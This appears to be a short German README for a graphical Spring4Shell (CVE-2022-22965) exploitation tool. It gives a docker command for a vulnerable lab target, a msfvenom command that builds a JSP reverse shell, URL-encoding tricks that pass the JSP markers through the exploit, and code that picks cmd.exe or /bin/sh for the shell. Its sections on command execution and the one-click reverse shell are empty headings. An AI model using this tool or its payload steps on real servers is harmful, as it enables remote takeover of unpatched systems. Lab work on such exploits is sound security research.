
Grafisches Erkennungstool für CVE-2022-22965 (Spring4Shell) mit Ein-Klick-Reverse-Shell-Generierung, Befehlsausführung und Multi-Server-Shell-Pfadanpassung.
靶机
docker run -itd -p 80:8080 vulfocus/spring-core-rce-2022-03-29:latest
Die Reverse-Shell basiert im Wesentlichen auf MSFvenom
msfvenom -p java/jsp_shell_reverse_tcp LHOST=xxx LPORT=xxx -f raw -o shell.jsp
Nach der URL-Kodierung der JSP-Datei verwenden Sie
%3C%25 ersetzen %25%7Bc2%7Di für <%
%25%3E ersetzen %25%7Bsuffix%7Di für %>
Im Code wird der Shell-Pfad je nach Servertyp angepasst
if self.radioButton_win.isChecked():
shellpath = "cmd.exe"
if self.radioButton_linux.isChecked():
shellpath = "/bin/sh"
Befehlsausführung:
whoami-Abfrage:
Ein-Klick-Reverse-Shell
